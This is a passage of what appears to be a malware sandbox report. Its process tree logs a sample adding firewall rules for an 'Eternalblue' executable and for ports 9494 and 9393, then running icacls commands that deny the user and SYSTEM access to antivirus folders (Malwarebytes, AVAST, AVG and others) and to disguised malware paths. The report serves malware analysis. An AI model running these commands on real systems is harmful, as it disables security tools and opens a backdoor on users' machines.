                                                                                                                                                                                          netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                          PID:1896
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:5296
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                          netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                          PID:3284
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3708
                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:3064
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3592
                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                              netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                              PID:4760
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5428
                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                PID:3828
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5316
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:744
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:3084
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:3196
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4652
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3044
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3124
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:276
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:772
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:4976
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5156
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:5496
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3480
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:3844
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:2340
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:712
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:5696
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:4684
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1032
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4540
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:1676
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5320
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:5344
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:2984
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:892
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:1352
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:836
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:5752
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:4988
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2032
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:3512
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:652
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2692
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:2296
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:3704
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2752
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5856
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:5604
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4720
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:4692
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2976
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:788
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:5872
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:872
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:3320
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4232
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:5928
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1640
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:3404
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:5404
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:2468
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2876
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:5300
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2620
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:6108
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5428
                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2464
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    PID:5468
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:4480
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:3196
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:744
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4296
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:2992
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2524
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            PID:3028
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5580
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                              PID:6004
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:5816
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                              icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                              PID:5676
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:2312
                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:2404
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:4540
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:5232
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:4756
